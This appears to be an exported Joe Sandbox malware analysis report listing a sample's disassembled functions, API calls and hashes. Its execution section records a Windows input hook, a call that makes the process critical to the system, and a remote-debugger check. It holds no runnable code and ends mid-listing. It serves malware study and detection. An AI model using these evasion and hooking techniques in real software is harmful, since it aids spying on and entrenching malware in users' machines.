                                                                          • Part of subcall function 00402C55: FindResourceW.KERNEL32(?,0000000A,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402CF0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: Value$FindResourcewcslen$AddressAllocateBackslashErrorFreeHeapLastLibraryPathProc$CharInitializeLoadRemoveTaskUpper__fprintf_lmemsetwcsncpy
                                                                        • String ID: $pA
                                                                        • API String ID: 790731606-4007739358
                                                                        • Opcode ID: 64ebd7b317967dc0aa4780699e57154d7a3f4f596edfabaaa6cc53898b52652e
                                                                        • Instruction ID: e60bee266b2990c05e42038f4eaf1cd2a2725b994cf9f5ea8c77fc408b4d2e90
                                                                        • Opcode Fuzzy Hash: 64ebd7b317967dc0aa4780699e57154d7a3f4f596edfabaaa6cc53898b52652e
                                                                        • Instruction Fuzzy Hash: 6851E6B9601204BEE500BBB39D82D7F266DDBC471CB108C3FB440A50D3E93CAE65662E
                                                                        Function 0040249D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCommandLineW.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0040254F
                                                                        • PathRemoveArgsW.SHLWAPI(?), ref: 00402585
                                                                          • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                                                          • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                                                                          • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(007C0000,00000000,?), ref: 0040E599
                                                                          • Part of subcall function 004099A5: SetEnvironmentVariableW.KERNELBASE(007C9F70,007C9F70,00404594,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004099BE
                                                                          • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                                                                          • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                                                                          • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                                                                          • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                                                                          • Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402F99,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178
                                                                          • Part of subcall function 0040E5F0: HeapFree.KERNEL32(007C0000,00000000,00000000,?,00000000,?,00412484,00000000,00000000,-00000008), ref: 0040E608
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: Value$ErrorHeapLast$AllocateArgsCommandEnvironmentFreeLinePathRemoveVariablewcslen
                                                                        • String ID: *pA
                                                                        • API String ID: 1199808876-3833533140
                                                                        • Opcode ID: 978365ab2a22ce9fb3928a5ef7e0fcf4419ed98c8898819fe6a111c9215247d9
                                                                        • Instruction ID: beb9823a99ae011e4ed5f1d055ef6d1d692690281f772a57edd19b399da9bd76
                                                                        • Opcode Fuzzy Hash: 978365ab2a22ce9fb3928a5ef7e0fcf4419ed98c8898819fe6a111c9215247d9
                                                                        • Instruction Fuzzy Hash: E541E9B5504301BED600BBB39D8293F76A8EBC471CF508C3FB444A61D2EA3CD9655A2E
                                                                        Function 0040973A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0040D968: TlsGetValue.KERNEL32(?,00409869,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000,00000000,00000200), ref: 0040D96F
                                                                          • Part of subcall function 0040D968: HeapAlloc.KERNEL32(00000008,?,?,00409869,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D98A
                                                                          • Part of subcall function 0040D968: TlsSetValue.KERNEL32(00000000,?,?,00409869,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D999
                                                                        • GetCommandLineW.KERNEL32(?,?,?,00000000,?,?,00409870,00000000,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015), ref: 00409754
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: Value$AllocCommandHeapLine
                                                                        • String ID: $"
                                                                        • API String ID: 1339485270-3817095088
                                                                        • Opcode ID: 9f13aeb594c8651f773918aba712108c6ee6300c7051426f9c00fbcbc60952a7
                                                                        • Instruction ID: 229198f1d41a65a6e9ffff917a794aecd7294c87f6384db1244c7b0cd665179e
                                                                        • Opcode Fuzzy Hash: 9f13aeb594c8651f773918aba712108c6ee6300c7051426f9c00fbcbc60952a7
                                                                        • Instruction Fuzzy Hash: 3131A6735252218ADB64AF10981127772A1EFA2B60F18C17FE4926B3C2F37D4D41D369
                                                                        Function 0040A638 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: _wcsicmpwcscmp
                                                                        • String ID: $0A
                                                                        • API String ID: 3419221977-513306843
                                                                        • Opcode ID: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
                                                                        • Instruction ID: a9c09230f7291aa91694be4cadd9aa4df44d847ede942287367b49c05577748a
                                                                        • Opcode Fuzzy Hash: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
                                                                        • Instruction Fuzzy Hash: 39118F76508B018BD3209F56D440913B3F9EF94364329893FD88963790DB76EC658BAA
                                                                        Function 00405700 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,00401218), ref: 00405722
                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,?,00401218), ref: 00405746
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide
                                                                        • String ID: $0A
                                                                        • API String ID: 626452242-513306843
                                                                        • Opcode ID: 73ef42fd297e56149542e4ba10b5f7343afa2e9a126b30dcd6987e1077dc572a
                                                                        • Instruction ID: 6633c5b8762e659e7e7445bcc2ebba2587ddb8769fcb30c67f307584ac15d0df
                                                                        • Opcode Fuzzy Hash: 73ef42fd297e56149542e4ba10b5f7343afa2e9a126b30dcd6987e1077dc572a
                                                                        • Instruction Fuzzy Hash: D4F0653A38632137E230215A6C06F57295DC785F71F3542367B247F3D0C5B1680046BD
                                                                        Function 0040DBFF Relevance: 5.1, APIs: 4, Instructions: 134memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • EnterCriticalSection.KERNEL32(?,?,?,00000000,0040A724,00000000,00000001,?,?,?,00000000,0040A54C,?,?,00000000,?), ref: 0040DC13
                                                                        • HeapAlloc.KERNEL32(00000000,-00000018,00000001,?,?,00000000,0040A724,00000000,00000001,?,?,?,00000000,0040A54C,?,?), ref: 0040DCC8
                                                                        • HeapAlloc.KERNEL32(00000000,-00000018,?,?,00000000,0040A724,00000000,00000001,?,?,?,00000000,0040A54C,?,?,00000000), ref: 0040DCEB
                                                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,0040A724,00000000,00000001,?,?,?,00000000,0040A54C,?,?,00000000,?,?), ref: 0040DD43
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: AllocCriticalHeapSection$EnterLeave
                                                                        • String ID:
                                                                        • API String ID: 830345296-0
                                                                        • Opcode ID: 324d660e7cdc21042891890593d34f1f0348325fed707f3f607e68598850c6a9
                                                                        • Instruction ID: 326a62a2d88e17b700e0b5dbbe6d23d3e5727d380a42910b8190cd6cec96877c
                                                                        • Opcode Fuzzy Hash: 324d660e7cdc21042891890593d34f1f0348325fed707f3f607e68598850c6a9
                                                                        • Instruction Fuzzy Hash: D151E570A04B069FD324CF69D980962B7F4FF587103148A3EE49A97A50D338F959CB94
                                                                        Function 0040E7D0 Relevance: 5.1, APIs: 4, Instructions: 62memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • wcslen.MSVCRT ref: 0040E7E5
                                                                        • HeapAlloc.KERNEL32(007C0000,00000000,0000000A), ref: 0040E809
                                                                        • HeapReAlloc.KERNEL32(007C0000,00000000,00000000,0000000A), ref: 0040E82D
                                                                        • HeapFree.KERNEL32(007C0000,00000000,00000000,?,?,0040506F,?,0041702E,00401095,00000000), ref: 0040E864
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$Alloc$Freewcslen
                                                                        • String ID:
                                                                        • API String ID: 2479713791-0
                                                                        • Opcode ID: 2b6b1bd9f026436857951278c42bc1b07c0eea740553c1e91eb77f15f4e50f5e
                                                                        • Instruction ID: 61d70e0538fde6a9b2f408d2d23f17b2afdd03d3414029a6c312abdd158bf447
                                                                        • Opcode Fuzzy Hash: 2b6b1bd9f026436857951278c42bc1b07c0eea740553c1e91eb77f15f4e50f5e
                                                                        • Instruction Fuzzy Hash: 6C2115B5604209EFCB04DF95D884FAAB7B9EB49354F10C169F8099B390D735EA81CB98
                                                                        Function 0040DB18 Relevance: 5.1, APIs: 4, Instructions: 56memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000), ref: 0040DB23
                                                                        • HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?), ref: 0040DB63
                                                                        • LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040DB9E
                                                                          • Part of subcall function 0040E1F2: HeapAlloc.KERNEL32(00000008,00000000,0040DA6C,00418670,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040E1FE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: AllocCriticalHeapSection$EnterLeave
                                                                        • String ID:
                                                                        • API String ID: 830345296-0
                                                                        • Opcode ID: 5d9d41e9d09ba23bc41a935226fc724bd5eb564a4c229014a10cb91462bf3418
                                                                        • Instruction ID: 234cd8b738bfcb23ec7c58dff1098e76d365aadfe99366d65fb7203dd4a6e8aa
                                                                        • Opcode Fuzzy Hash: 5d9d41e9d09ba23bc41a935226fc724bd5eb564a4c229014a10cb91462bf3418
                                                                        • Instruction Fuzzy Hash: 6A113D72504710AFC3208F68DC40D56BBFAEB48721B15892EE596E36A0CB34F844CB65
                                                                        Function 0040DD5D Relevance: 5.0, APIs: 4, Instructions: 44memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • EnterCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040E03E,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200), ref: 0040DD6F
                                                                        • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040E03E,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F), ref: 0040DD86
                                                                        • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040E03E,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F), ref: 0040DDA2
                                                                        • LeaveCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040E03E,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200), ref: 0040DDBF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalFreeHeapSection$EnterLeave
                                                                        • String ID:
                                                                        • API String ID: 1298188129-0
                                                                        • Opcode ID: b3beb58b6f71b40006eb08016dd7c334f266477d507c334884bffe37f11cccde
                                                                        • Instruction ID: 339acd6113cd15283fdaf2d24efa5c6700350868ea18a16039eb98c455fe0077
                                                                        • Opcode Fuzzy Hash: b3beb58b6f71b40006eb08016dd7c334f266477d507c334884bffe37f11cccde
                                                                        • Instruction Fuzzy Hash: 7C012C71A0161ABFC7108F96ED049A7FB78FF49751345817AA804A7664D734E824CFE8
                                                                        Function 0040A54F Relevance: 5.0, APIs: 4, Instructions: 43memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0040A79A: memset.MSVCRT ref: 0040A802
                                                                          • Part of subcall function 0040DFC6: EnterCriticalSection.KERNEL32(00418684,00000200,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3), ref: 0040DFDA
                                                                          • Part of subcall function 0040DFC6: HeapFree.KERNEL32(00000000,?,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004), ref: 0040E028
                                                                          • Part of subcall function 0040DFC6: LeaveCriticalSection.KERNEL32(00418684,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040E02F
                                                                        • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 0040A57A
                                                                        • HeapFree.KERNEL32(00000000,?,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A586
                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 0040A59A
                                                                        • HeapFree.KERNEL32(00000000,00000000,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A5B0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: FreeHeap$CriticalSection$EnterLeavememset
                                                                        • String ID:
                                                                        • API String ID: 4254243056-0
                                                                        • Opcode ID: 9b91829c39ba2b5ec3bef2853771c0dd8412306e6433636457154be9583086ba
                                                                        • Instruction ID: 62ba4ec21453903b754b53d00370c9fddb20f7a3713721c865cfde946388869e
                                                                        • Opcode Fuzzy Hash: 9b91829c39ba2b5ec3bef2853771c0dd8412306e6433636457154be9583086ba
                                                                        • Instruction Fuzzy Hash: B5F04471105209BFC6125B16DD40C57BF7DFF49798342412AB40463570CB36ED75DBA8

                                                                        Execution Graph

                                                                        Execution Coverage:22.7%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:20%
                                                                        Total number of Nodes:15
                                                                        Total number of Limit Nodes:0
                                                                        execution_graph 5749 7ff848e68dad 5750 7ff848e68dbf 5749->5750 5753 7ff848e683c0 5750->5753 5752 7ff848e68dfb 5754 7ff848e683c9 SetWindowsHookExW 5753->5754 5756 7ff848e69031 5754->5756 5756->5752 5761 7ff848e68a0d 5762 7ff848e68a3f RtlSetProcessIsCritical 5761->5762 5764 7ff848e68af2 5762->5764 5765 7ff848e683b5 5767 7ff848e683bf SetWindowsHookExW 5765->5767 5768 7ff848e69031 5767->5768 5757 7ff848e66e61 5758 7ff848e66e7f CheckRemoteDebuggerPresent 5757->5758 5760 7ff848e66f1f 5758->5760

                                                                        Executed Functions

                                                                        Function 00007FF848E66E61 Relevance: 1.6, APIs: 1, Instructions: 127COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 732 7ff848e66e61-7ff848e66f1d CheckRemoteDebuggerPresent 736 7ff848e66f1f 732->736 737 7ff848e66f25-7ff848e66f68 732->737 736->737
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3290308691.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7ff848e60000_x.jbxd
                                                                        Similarity
                                                                        • API ID: CheckDebuggerPresentRemote
                                                                        • String ID:
                                                                        • API String ID: 3662101638-0
                                                                        • Opcode ID: 17e247f8a1399df31f7b4523f43248ab248b169a978a0c85e8342f6230e96d33
                                                                        • Instruction ID: ba8f84bd0d9c7714aee794c3359195fa2c88ee24d6536d577e335e748b4d1f24
                                                                        • Opcode Fuzzy Hash: 17e247f8a1399df31f7b4523f43248ab248b169a978a0c85e8342f6230e96d33
                                                                        • Instruction Fuzzy Hash: 0431F3319086588FCB58DF5888466E97BE0FF65311F05416AD489D7152D734A845CB91
                                                                        Function 00007FF848E68A0D Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 684 7ff848e68a0d-7ff848e68af0 RtlSetProcessIsCritical 688 7ff848e68af8-7ff848e68b2d 684->688 689 7ff848e68af2 684->689 689->688
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3290308691.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7ff848e60000_x.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalProcess
                                                                        • String ID:
                                                                        • API String ID: 2695349919-0
                                                                        • Opcode ID: ffed8b2d5d04a0056f0b34f33a23ca5dc5b2a8cded307e6d01ea9edfa816d804
                                                                        • Instruction ID: cabe28d75bdded8bba429fee35d9e2e265d51f0283eb326ba399945bfc6cc90b
                                                                        • Opcode Fuzzy Hash: ffed8b2d5d04a0056f0b34f33a23ca5dc5b2a8cded307e6d01ea9edfa816d804
                                                                        • Instruction Fuzzy Hash: EF41E33180C6598FDB19DFA8D845BE9BBF0FF56311F04416EE08AD3692CB74A846CB91
                                                                        Function 00007FF848E683B5 Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 691 7ff848e683b5-7ff848e68fdd 697 7ff848e69069-7ff848e6906d 691->697 698 7ff848e68fe3-7ff848e68ff0 691->698 699 7ff848e68ff2-7ff848e6902f SetWindowsHookExW 697->699 698->699 701 7ff848e69037-7ff848e69068 699->701 702 7ff848e69031 699->702 702->701
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3290308691.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7ff848e60000_x.jbxd
                                                                        Similarity
                                                                        • API ID: HookWindows
                                                                        • String ID:
                                                                        • API String ID: 2559412058-0
                                                                        • Opcode ID: 006ec89b72f45adb652d6fcc4cd39ceccd4874b86ec47362dd1cc34857b6ff11
                                                                        • Instruction ID: a2833ad1639375361a5871bd6c1d3eb9b1058ea5feb9c26e4c987db3b2c0daf3
                                                                        • Opcode Fuzzy Hash: 006ec89b72f45adb652d6fcc4cd39ceccd4874b86ec47362dd1cc34857b6ff11
                                                                        • Instruction Fuzzy Hash: 00411471A0CE5C8FEB58EF6C98056B9BBE1FB69361F04017ED049D3192CB70B8428B85
                                                                        Function 00007FF848E68F58 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 705 7ff848e68f58-7ff848e68f5f 706 7ff848e68f6a-7ff848e68fdd 705->706 707 7ff848e68f61-7ff848e68f69 705->707 711 7ff848e69069-7ff848e6906d 706->711 712 7ff848e68fe3-7ff848e68ff0 706->712 707->706 713 7ff848e68ff2-7ff848e6902f SetWindowsHookExW 711->713 712->713 715 7ff848e69037-7ff848e69068 713->715 716 7ff848e69031 713->716 716->715
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3290308691.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7ff848e60000_x.jbxd
                                                                        Similarity
                                                                        • API ID: HookWindows
                                                                        • String ID:
                                                                        • API String ID: 2559412058-0
                                                                        • Opcode ID: 37a82bb425131dc94cb46cbcfe0a969189a005a0cb44bc17975cf6344e5bb69a
                                                                        • Instruction ID: 0498b8ea233e508dc112bdbb40f05121f27369f25f67c3aaa417b4d09e43bf15
                                                                        • Opcode Fuzzy Hash: 37a82bb425131dc94cb46cbcfe0a969189a005a0cb44bc17975cf6344e5bb69a
                                                                        • Instruction Fuzzy Hash: F8312931A1CA5C9FEB58EB6C98066F9BBE1FB55321F00423ED049D3292CB74A81287C1
                                                                        Function 00007FF848E683C0 Relevance: 1.6, APIs: 1, Instructions: 130COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 719 7ff848e683c0-7ff848e68fdd 724 7ff848e69069-7ff848e6906d 719->724 725 7ff848e68fe3-7ff848e68ff0 719->725 726 7ff848e68ff2-7ff848e6902f SetWindowsHookExW 724->726 725->726 728 7ff848e69037-7ff848e69068 726->728 729 7ff848e69031 726->729 729->728
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3290308691.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7ff848e60000_x.jbxd
                                                                        Similarity
                                                                        • API ID: HookWindows
                                                                        • String ID:
                                                                        • API String ID: 2559412058-0
                                                                        • Opcode ID: 2b00f1daf1856436c20043a579d8ad02fc4b33522c4ca2cb751600ae81ef00d3
                                                                        • Instruction ID: 3fe5fbeaa66039a950a73b6c35870a251479c42bca0ddec855f182941fcee894
                                                                        • Opcode Fuzzy Hash: 2b00f1daf1856436c20043a579d8ad02fc4b33522c4ca2cb751600ae81ef00d3
                                                                        • Instruction Fuzzy Hash: 0C31073190CE5C8FEB58EB6C98056B9B7E1FB59321F00417ED049D3292CB70B8528B85

                                                                        Executed Functions

                                                                        Function 00007FF848F56605 Relevance: .4, Instructions: 433COMMON
